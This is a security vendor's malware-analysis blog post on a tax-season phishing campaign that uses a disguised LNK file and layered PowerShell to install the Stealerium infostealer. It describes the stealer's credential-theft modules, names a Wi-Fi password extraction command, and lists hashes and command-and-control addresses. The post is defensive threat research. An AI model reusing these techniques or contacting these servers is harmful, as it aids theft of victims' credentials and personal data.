• News
  • Security
  • Products
  • About Seqrite
Blogs on Information Technology, Network & Cybersecurity | Seqrite Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  Cybersecurity • Cybersecurity Tips • Government  /  Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer
Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer
30 April 2025

Threat Actors are Targeting US Tax-Session with new Tactics of Stealerium-infostealer

Written by Dixit Panchal
Dixit Panchal
Cybersecurity, Cybersecurity Tips, Government

Introduction

A security researcher from Seqrite Labs has uncovered a malicious campaign targeting U.S. citizens as Tax Day approaches on April 15. Seqrite Labs has identified multiple phishing attacks leveraging tax-related themes as a vector for social engineering, aiming to exfiltrate user credentials and deploy malware. These campaigns predominantly utilize redirection techniques, such as phishing emails, and exploit malicious LNK files to further their objectives.

Each year, cybercriminals exploit the tax season as an opportunity to deploy various social engineering tactics to compromise sensitive personal and financial data. These adversaries craft highly deceptive campaigns designed to trick taxpayers into divulging confidential information, making fraudulent to counterfeit services, or inadvertently installing malicious payloads on their devices, thereby exposing them to identity theft and financial loss.

Infection Chain:

Fig 1: Infection chain

Initial analysis about campaign:

While tax-season phishing, attacks pose a risk to a broad spectrum of individuals, our analysis indicates that certain demographics are disproportionately vulnerable. Specifically, high-risk targets include individuals with limited knowledge of government tax processes, such as green card holders, small business owners, and new taxpayers.

Our findings reveal that threat actors are leveraging a sophisticated phishing technique in which they deliver files via email with deceptive extensions. One such example is a file named “104842599782-4.pdf.lnk,” which utilizes a malicious LNK extension. This tactic exploits user trust by masquerading as a legiti payments mate document, ultimately leading to the execution of malicious payloads upon interaction.

Decoy Document:

Threat actors are disseminating a transcript related to tax sessions, targeting individuals through email by sharing it as a malicious attachment. These cybercriminals are leveraging this document as a vector to deliver harmful payloads, thereby compromising the security of the recipients.

 

Fig 2: Decoy Document

Technical Analysis:

We have retrieved the LNK file, identified as “04842599782-4.pdf.lnk,” which was utilized in the attack. This LNK file embeds a Base64-encoded payload within its structure.

Fig 3: Inside LNK File

Upon decoding the string, we extracted a PowerShell command line that itself contains another Base64-encoded payload embedded within it.

Fig 4: Encoded PowerShell Command Line

 

Subsequently, upon decoding the nested Base64 string, we uncovered the final PowerShell command line embedded within the payload.

Fig 5: Decoded Command Line

The extracted PowerShell command line initiated the download of rev_pf2_yas.txt, which itself is a PowerShell script (Payload.ps1) containing yet another Base64-encoded payload embedded within it.

Fig 6: 2nd PowerShell command with Base64 Encoded

We have decoded the above Base64 encoded command line and get below final executable.

Fig 7: Decoded PowerShell Command

According to the PowerShell command line, the script Payload.ps1 (or rev_pf2_yas.txt) initiated the download of an additional file, revolaomt.rar, from the Command and Control (C2) server. This archive contained a malicious executable, named either Setup.exe or revolaomt.exe.

Detail analysis of Setup.exe / revolaomt.exe:

Fig 8: Detect it Easy

Upon detailed examination of the Setup.exe binary, it was identified as a PyInstaller-packaged Python executable. Subsequent extraction and decompilation revealed embedded Python bytecode artifacts, including DCTYKS.pyc and additional Python module components.

Fig 9: PyInstaller-packaged Python executable
Fig 10: In side DCTYKS.pyc

Upon analysis of the DCTYKS.pyc sample, it was determined that the file contains obfuscated or encrypted payload data, which is programmatically decrypted at runtime and subsequently executed, as illustrated in the figure above.

Fig 11: Encoded DCTYKS.pyc with Base64

Upon successful decryption of the script, it was observed that the sample embeds a Base64-encoded executable payload. The decrypted payload leverages process injection techniques to target mstsc.exe for execution. Further analysis of the second-stage payload revealed it to be a .NET-compiled binary.

Analysis 2nd Payload (Stealerium malware):

Fig 12: .NET Base Malware sample

The second-stage payload is identified as a .NET-based malware sample. Upon inspection of its class structures, methods, and overall functionality, the sample exhibits strong behavioural and structural similarities to the Stealerium malware family, specifically aligning with version 1.0.35.

Stealerium is an open-source information-stealing malware designed to exfiltrate sensitive data from web browsers, cryptocurrency wallets, and popular applications such as Discord, Steam, and Telegram. It performs extensive system reconnaissance by harvesting details including active processes, desktop screenshots, and available Wi-Fi network configurations. Additionally, the malware incorporates sophisticated anti-analysis mechanisms to identify execution within virtualized environments and detect the presence of debugging tools.

Anti_Analysis

Fig 13: Anti Analysis Techniques
Fig 14: GitHub URLs
Fig 15: Detecting Suspicious ENV

This AntiAnalysis class is part of malware designed to detect sandbox, virtual machines, emulators, suspicious processes, services, usernames, and more. It checks system attributes against blacklists fetched from online sources (github). If any suspicious environment is detected, it logs the finding and may trigger self-destruction. This helps the malware avoid analysis in controlled or security research setups.

Mutex Creation

Fig 16: Mutex Creation

This MutexControl class prevents multiple instances of the malware from running at the same time. It tries to create a system-wide mutex using a name from Config.Mutex (QT1bm11ocWPx). If the mutex already exists, it means another instance is running, so it exits the process. If an error occurs during this check, it logs the error and exits too.

Fig 17: Configuration of StringsCrypt.DecryptConfig

It configures necessary values by decrypting them with StringsCrypt.DecryptConfig. It handles the decryption of the server base URL and WebSocket address. If enabled, it also decodes cryptocurrency wallet addresses from Base64 and decrypts them using AES-256 encryption.

“hxxp://91.211.249.142:7816”

Radom Directory Creation

Fig 18: Random Directory Creation

The InitWorkDir() method generates a random subdirectory under %LOCALAPPDATA%, creates it if it doesn’t exist, and hides it for stealth purposes. This is likely used for storing data or maintaining persistence without detection.

\AppData\Local\e9d3e2dd2788c322ffd2c9defddf7728 random directory is created in hidden attribute.

BoT Registration

Fig 19: BOT Registration

The RegisterBot method initiates an HTTP POST request to register a bot instance, utilizing a unique hash identifier and an authorization token for authentication. It serializes the registration payload, appends the necessary HTTP headers, and logs the server response or any encountered exceptions. The method returns a boolean value—true upon successful execution, and false if an exception is raised during the process.

RequestUri: ‘http[:]//91[.]211[.]249[.]142:7816/api/bot/v1/register’

 

Stealer Activity From Browser:

Fig 20: Stealer activity from Browser

It extracts browser-related data (passwords, cookies, credit cards, history, bookmarks, autofill) from a given user data profile path.

FileZilla Credentials stealer activity

Fig 21: FileZilla Credential Stealer activity

The above code is part of a password-stealing component targeting FileZilla, an FTP client.

Gaming Platform Data Extraction Modules

Fig 22: Gaming platform data extraction

This component under bt.Stub.Target.Gaming is designed to collect data from the following platforms:

  • BattleNet
  • Minecraft
  • Steam
  • Uplay

Each class likely implements routines to extract user data, game configurations, or sensitive files for exfiltration.

Fig 23: Checks for a Minecraft installation

It checks for a Minecraft installation and creates a save directory to exfiltrate various data like mods, files, versions, logs, and screenshots. It conditionally captures logs and screenshots based on the Config.GrabberModule setting.

Messenger Data Stealer Modules

Itargets various communication platforms to extract user data or credentials from:

  • Discord
  • Element
  • ICQ
  • Outlook
  • Pidgin
  • Signal
  • Skype
  • Telegram
  • Tox

Below is one example of Outlook Credentials Harvesting

It targets specific registry keys associated with Outlook profiles to extract sensitive information like email addresses, server names, usernames, and passwords. It gathers data for multiple mail clients (SMTP, POP3, IMAP) and writes the collected information to a file (Outlook.txt).

Fig 24: Messenger Data Extraction

 

Webcam Screenshot Capture

Attempts to take a screenshot using a connected webcam, saving the image as a JPEG file. If only one camera is connected, it triggers a series of messages to capture the webcam image, which is then saved to the specified path (camera.jpg or a timestamped filename). The method is controlled by a configuration setting (Config.WebcamScreenshot).

 

Fig 25: Webcam Screen shot captures

 

Wi-Fi Password Retrieval

 

It retrieves the Wi-Fi password for a given network profile by running the command netsh wlan show profile and extracting the password from the output. The command uses findstr Key to filter the password, which is then split and trimmed to get the value

 

Fig 26: WI-FI Password Retrieval

 

VPN Data Extraction

It targets various VPN applications to exfiltrate sensitive information such as login credentials:

  • NordVpn
  • OpenVpn
  • ProtonVpn

For example, it  extracts and saves NordVPN credentials from the user.config file found in NordVPN installation directories. It looks for “Username” and “Password” settings, decodes them, and writes them to a file (accounts.txt) in the specified savePath.

 

Fig 27: VPN Data Extraction

 

Porn Detection & Screenshot Capture

Fig 28: Porn Detection & Snapshot Captures.

It detects adult content by checking if the active window’s title contains specific keywords related to NSFW content (configured in Config.PornServices). If such content is detected, it triggers a screenshot capture.

Conclusion:

Based on our recent proactive threat analysis, we’ve identified that cybercriminals are actively targeting U.S. citizens around the tax filing period scheduled for April 15. These threat actors are leveraging the occasion to deploy Stealerium malware, using deceptive tactics to trick users.

Stealerium malware is designed to steal Personally Identifiable Information (PII) from infected devices and transmit it to attacker-controlled bots for further exploitation.

To safeguard your data and devices, we strongly recommend using Seqrite Endpoint Security, which provides advanced protection against such evolving threats.

Stay secure. Stay protected with Seqrite.

TTPS

Tactic Technique ID Name
Initial Access T1566.001 Phishing: Spear phishing Attachment
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Evasion T1140 Deobfuscate/Decode Files or Information
T1027 Obfuscated Files or Information
T1497 Virtualization/Sandbox Evasion
T1497.001 System Checks
Credential Access T1555.003 Credentials from Password Stores:  Credentials from Web Browsers

 

T1539 Steal Web Session Cookie
Discovery T1217 Browser Information Discovery
T1016 System Network Configuration Discovery: Wi-Fi Discovery
Collection T1113 Screen Capture
Exfiltration T1567.004 Exfiltration Over Web Service:  Exfiltration Over Webhook

 

Seqrite Protections:

  • HEUR:Trojan.Win32.PH
  • Trojan.49490.GC
  • trojan.49489.GC

IoCs:

File Name SHA-256
Setup.exe/revolaomt.exe 6a9889fee93128a9cdcb93d35a2fec9c6127905d14c0ceed14f5f1c4f58542b8
104842599782-4.pdf.lnk 48328ce3a4b2c2413acb87a4d1f8c3b7238db826f313a25173ad5ad34632d9d7
payload_1.ps1 / fgrsdt_rev_hx4_ln_x.txt 10f217c72f62aed40957c438b865f0bcebc7e42a5e947051edee1649adf0cbf2
revolaomt.rar 31705d906058e7324027e65ce7f4f7a30bcf6c30571aa3f020e91678a22a835a
104842599782-4.html Ff5e3e3bf67d292c73491fab0d94533a712c2935bb4a9135546ca4a416ba8ca1

 

C2:

  • hxxp[:]//91[.]211[.]249[.]142:7816/
  • hxxp://91.211.249.142:7816″
  • hxxp[:]//185[.]237[.]165[.]230/

 

Authors:

Dixit Panchal
Kartik Jivani
Soumen Burma

 Previous PostAdvisory: Pahalgam Attack themed decoys used by APT36 to target t...
Next Post  GDPR vs. DPDP: A Guide for Businesses Navigating Global Data Priv...
Dixit Panchal

About Dixit Panchal

I am a Security Researcher at Quick Heal Technologies Ltd, working as part of the Seqrite Lab team. My expertise includes Threat hunting, Malware research &...

Articles by Dixit Panchal »

Related Posts

  • ZTNA Use Cases and Benefits for BFSI

    May 19, 2025
  • Market Guide for Choosing the Right ZTNA Solution

    May 14, 2025
  • Protect What Matters Most with Data Discovery and Classification

    May 12, 2025
Featured Authors
  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director of Quick Heal Technologies...

    Read more..
  • Mahua Chakrabarthy
    Mahua Chakrabarthy

    A tea connoisseur who firmly believes that life is too short for dull content....

    Read more..
Topics
apt (19) Cyber-attack (35) cyber-attacks (58) cyberattack (16) cyberattacks (13) Cybersecurity (322) cyber security (31) Cyber threat (33) cyber threats (48) Data (11) data breach (55) data breaches (28) data loss (28) data loss prevention (34) data privacy (11) data protection (24) data security (15) DLP (49) Encryption (16) endpoint security (107) Enterprise security (17) Exploit (14) firewall (11) GDPR (12) hackers (11) malware (76) malware attack (23) malware attacks (12) MDM (25) Microsoft (15) Network security (22) Patch Management (12) phishing (27) Ransomware (67) ransomware attack (30) ransomware attacks (30) ransomware protection (13) security (11) Seqrite (33) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) UTM (34) Vulnerability (16) windows (11)
Loading
Resources
  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies
About Us
  • About Seqrite
  • Leadership
  • Awards & Certifications
  • Newsroom
Archives
  • By Date
  • By Category
Loading

© 2025 Quick Heal Technologies Ltd. Cookie Policies Privacy Policies